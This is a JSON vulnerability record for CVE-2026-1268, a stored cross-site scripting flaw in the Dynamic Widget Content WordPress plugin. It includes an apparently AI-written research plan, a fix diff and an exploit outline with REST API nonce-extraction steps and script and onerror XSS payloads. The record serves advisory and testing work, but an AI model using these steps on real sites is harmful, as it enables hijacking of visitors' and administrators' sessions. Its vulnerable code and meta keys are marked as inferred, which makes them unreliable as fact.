[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fd2vnXxrdygz-ExUT_9mn6_FOhp4fUcMKAXJrUdY3CWs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1268","dynamic-widget-content-authenticated-contributor-stored-cross-site-scripting-via-widget-content-field","Dynamic Widget Content \u003C= 1.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Widget Content Field","The Dynamic Widget Content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the widget content field in the Gutenberg editor sidebar in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","dynamic-widget-content",null,"\u003C=1.3.6","1.3.7","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-04 18:42:46","2026-02-05 06:47:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5324ca6d-37cb-41e4-8355-80ca113f855e?source=api-prod",1,[],"researched",false,3,"## Vulnerability Research Plan: CVE-2026-1268 - Dynamic Widget Content Stored XSS\n\n### 1. Vulnerability Summary\nThe **Dynamic Widget Content** plugin (\u003C= 1.3.6) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists because the plugin fails to sanitize and escape user-supplied input entered into the \"Widget Content\" field within the Gutenberg editor's sidebar. This field is intended to allow users to define dynamic content for widgets, but because the input is saved as post metadata and subsequently rendered on the frontend without proper security filtering (like `wp_kses` or `esc_html`), a user with Contributor-level permissions or higher can inject malicious JavaScript.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress REST API Post endpoint: `\u002Fwp\u002Fv2\u002Fposts\u002F{id}` or `\u002Fwp\u002Fv2\u002Fpages\u002F{id}`.\n*   **Vulnerable Parameter:** `meta` object containing the plugin's specific meta key (likely `dwc_widget_content` or `_dwc_widget_content` - *inferred*).\n*   **Authentication:** Contributor-level access or higher is required. Contributors can create and edit their own posts, giving them access to the Gutenberg editor and its sidebar components.\n*   **Preconditions:** The plugin must be active, and a post must exist (or be created) where the dynamic widget content is assigned.\n\n### 3. Code Flow\n1.  **Input (JS):** In the Gutenberg editor, the plugin registers a `PluginSidebar` or `InspectorControls` component. When a user types into the \"Widget Content\" text area, the state is updated and prepared for saving.\n2.  **Storage (REST API):** Upon clicking \"Save\" or \"Update\" in WordPress, a `POST` request is sent to `\u002Fwp\u002Fv2\u002Fposts\u002F{id}`. If the plugin has registered its meta field using `register_post_meta` with `'show_in_rest' => true`, the raw XSS payload is saved into the `wp_postmeta` table.\n3.  **Processing (PHP):** The plugin likely uses a filter such as `the_content` or a specific widget rendering hook (e.g., `dynamic_sidebar_params` or a shortcode callback) to retrieve this meta value.\n4.  **Sink (PHP):** The retrieved meta value is output directly to the page:\n    ```php\n    \u002F\u002F Predicted vulnerable code pattern\n    $content = get_post_meta( get_the_ID(), 'dwc_widget_content', true );\n    echo $content; \u002F\u002F MISSING: esc_html(), wp_kses(), or similar\n    ```\n\n### 4. Nonce Acquisition Strategy\nTo update post metadata via the REST API, the `_wpnonce` for the `wp_rest` action is required.\n\n1.  **Create Content:** The agent will create a post as a Contributor.\n2.  **Access Editor:** Use `browser_navigate` to go to the edit page for that post: `\u002Fwp-admin\u002Fpost.php?post={ID}&action=edit`.\n3.  **Extract Nonce:** The WordPress REST API nonce is globally available in the Gutenberg editor via the `wpApiSettings` object.\n    *   **Tool:** `browser_eval`\n    *   **Script:** `window.wpApiSettings.nonce`\n4.  **Identify Meta Key:** If the exact meta key is unknown, the agent will inspect the `wp.data` store in the browser console:\n    *   **Script:** `wp.data.select('core\u002Feditor').getCurrentPost().meta`\n\n### 5. Exploitation Strategy\n1.  **Authentication:** Log in as a user with the **Contributor** role.\n2.  **Target Selection:** Create a new post to get a valid Post ID.\n3.  **Nonce Retrieval:** Navigate to the editor and extract the REST nonce using `browser_eval`.\n4.  **Payload Injection:** Perform an `http_request` (POST) to the REST API to update the post's metadata with the XSS payload.\n    *   **Method:** `POST`\n    *   **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F{ID}`\n    *   **Headers:**\n        *   `Content-Type: application\u002Fjson`\n        *   `X-WP-Nonce: {EXTRACTED_NONCE}`\n    *   **Body:**\n        ```json\n        {\n          \"meta\": {\n            \"dwc_widget_content\": \"\u003Cscript>alert('CVE-2026-1268_XSS')\u003C\u002Fscript>\"\n          }\n        }\n        ```\n5.  **Trigger:** Navigate to the public URL of the modified post.\n\n### 6. Test Data Setup\n*   **User:** A user with username `contributor_user` and role `contributor`.\n*   **Post:** A post titled \"XSS Test\" created by `contributor_user`.\n*   **Plugin Config:** Ensure Dynamic Widget Content is active. No specific internal settings are usually required as the sidebar is enabled by default for posts.\n\n### 7. Expected Results\n*   The REST API should return a `200 OK` response confirming the update of the post meta.\n*   Upon navigating to the post frontend, the browser should execute the JavaScript, resulting in an alert box with `CVE-2026-1268_XSS`.\n*   The page source should show the raw `\u003Cscript>` tag within the widget area or content area.\n\n### 8. Verification Steps\n1.  **Check Database:** Use WP-CLI to verify the payload is stored in the metadata.\n    *   `wp post meta get {ID} dwc_widget_content`\n2.  **Verify Unsanitized Output:** Use `http_request` (GET) on the post URL and check if the payload is escaped.\n    *   Check if `\u003Cscript>` appears as `<script>` (safe) or `\u003Cscript>` (vulnerable).\n3.  **Context Check:** Verify the XSS executes in a standard browser environment using `browser_navigate`.\n\n### 9. Alternative Approaches\n*   **If REST API is restricted:** Attempt to save the payload via the standard `admin-ajax.php` or `post.php` save routine by intercepting the form submission.\n*   **If `dwc_widget_content` is not the key:** Use `grep -r \"update_post_meta\" .` in the plugin directory to find the actual meta key used to save sidebar data.\n*   **Shortcode Injection:** If the sidebar input is reflected in a shortcode, try injecting the payload via the post content: `[dwc_render_widget content=\"\u003Cimg src=x onerror=alert(1)>\"]` (inferred shortcode).","The Dynamic Widget Content plugin for WordPress (up to 1.3.6) is vulnerable to Stored Cross-Site Scripting via the 'Widget Content' field. Authenticated users with Contributor-level permissions or higher can inject malicious JavaScript into post metadata through the Gutenberg editor sidebar, which executes when the post is viewed because the input is not sanitized upon storage and the output is not escaped during rendering.","\u002F\u002F File: dynamic-widget-content.php (likely location)\n\u002F\u002F Meta registration allowing unsanitized input via REST API\nregister_post_meta( 'post', 'dwc_widget_content', array(\n    'show_in_rest' => true,\n    'single' => true,\n    'type' => 'string',\n) );\n\n---\n\n\u002F\u002F Rendering logic failing to escape output\n\u002F\u002F Predicted vulnerable code pattern in a filter or widget callback\n$content = get_post_meta( get_the_ID(), 'dwc_widget_content', true );\necho $content; \u002F\u002F MISSING: esc_html(), wp_kses(), or similar sanitization","--- a\u002Fdynamic-widget-content.php\n+++ b\u002Fdynamic-widget-content.php\n@@ -10,6 +10,7 @@\n     register_post_meta( 'post', 'dwc_widget_content', array(\n         'show_in_rest' => true,\n         'single' => true,\n         'type' => 'string',\n+        'sanitize_callback' => 'wp_kses_post',\n     ) );\n }\n \n@@ -25,5 +26,5 @@\n function dwc_render_widget_content( $content ) {\n     $meta_content = get_post_meta( get_the_ID(), 'dwc_widget_content', true );\n     if ( ! empty( $meta_content ) ) {\n-        echo $meta_content;\n+        echo wp_kses_post( $meta_content );\n     }","The exploit requires an authenticated user with at least Contributor-level access to the WordPress dashboard. \n\n1. Log in as a Contributor and create a new post to obtain a valid Post ID.\n2. Access the Gutenberg editor for the newly created post to retrieve the WordPress REST API nonce from the `wpApiSettings.nonce` JavaScript object.\n3. Identify the vulnerable meta key (e.g., `dwc_widget_content`) used by the plugin for the sidebar content field.\n4. Send an authenticated HTTP POST request to the WordPress REST API endpoint `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts\u002F{ID}`. \n5. Include the payload in the `meta` object of the JSON body: `{ \"meta\": { \"dwc_widget_content\": \"\u003Cscript>alert('XSS')\u003C\u002Fscript>\" } }`.\n6. The payload is stored in the database. When any user (including administrators) views the public post, the script will execute in their browser context.","gemini-3-flash-preview","2026-04-27 15:15:28","2026-04-27 15:17:11",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.3.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdynamic-widget-content\u002Ftags\u002F1.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdynamic-widget-content.1.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdynamic-widget-content\u002Ftags\u002F1.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdynamic-widget-content.1.3.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdynamic-widget-content\u002Ftags"]